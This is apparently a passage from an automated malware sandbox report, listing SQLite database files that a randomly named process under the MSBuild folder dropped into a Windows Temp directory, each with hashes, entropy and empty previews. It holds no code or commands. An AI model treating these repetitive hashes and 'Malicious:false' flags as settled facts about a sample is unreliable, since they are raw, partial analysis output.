                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.1358696453229276
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\YRwBmyofaT

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                      Category:dropped
                                                                                      Size (bytes):114688
                                                                                      Entropy (8bit):0.9746603542602881
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\YX9a1xbTqG

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):40960
                                                                                      Entropy (8bit):0.8553638852307782
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\Yb6cumUWT6

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):20480
                                                                                      Entropy (8bit):0.5707520969659783
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                      MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                      SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                      SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                      SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\ZFkeR7UQZ6

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.1358696453229276
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\ZkwRiUvdgT

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                      Category:dropped
                                                                                      Size (bytes):114688
                                                                                      Entropy (8bit):0.9746603542602881
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\aA0lrC33q9

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                      Category:dropped
                                                                                      Size (bytes):114688
                                                                                      Entropy (8bit):0.9746603542602881
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\aKLPK1ruvi

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):49152
                                                                                      Entropy (8bit):0.8180424350137764
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                      MD5:349E6EB110E34A08924D92F6B334801D
                                                                                      SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                      SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                      SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\aSe2nyqxie

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.1358696453229276
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\aeUm86pc1E

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):40960
                                                                                      Entropy (8bit):0.8553638852307782
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\arxxnoL7p3

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):20480
                                                                                      Entropy (8bit):0.5707520969659783
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                      MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                      SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                      SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                      SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\ayDFRodWcn

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):40960
                                                                                      Entropy (8bit):0.8553638852307782
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\b7SK9LPlvu

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):20480
                                                                                      Entropy (8bit):0.5707520969659783
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                      MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                      SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                      SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                      SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\bIWEHIrqMr

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                      Category:dropped
                                                                                      Size (bytes):28672
                                                                                      Entropy (8bit):2.5793180405395284
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                      MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                      SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                      SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                      SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\bQHOxeWd9Z

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                      Category:dropped
                                                                                      Size (bytes):28672
                                                                                      Entropy (8bit):2.5793180405395284
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                      MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                      SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                      SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                      SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\bxtIaEBsIS

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                      Category:dropped
                                                                                      Size (bytes):28672
                                                                                      Entropy (8bit):2.5793180405395284
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                      MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                      SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                      SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                      SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\c5DJ613D15

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):49152
                                                                                      Entropy (8bit):0.8180424350137764
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                      MD5:349E6EB110E34A08924D92F6B334801D
                                                                                      SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                      SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                      SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\cLNiVayqoa

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.1358696453229276
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\cSkcZbtXlQ

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.1358696453229276
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\d1H8lEAZ5D

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.1358696453229276
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\d4McfG4fXR

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):49152
                                                                                      Entropy (8bit):0.8180424350137764
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                      MD5:349E6EB110E34A08924D92F6B334801D
                                                                                      SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                      SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                      SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\dIvewW8j9h

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):20480
                                                                                      Entropy (8bit):0.5707520969659783
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                      MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                      SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                      SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                      SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\dif8mNBjCi

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):20480
                                                                                      Entropy (8bit):0.5707520969659783
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                      MD5:9F6D153D934BCC50E8BC57E7014B201A
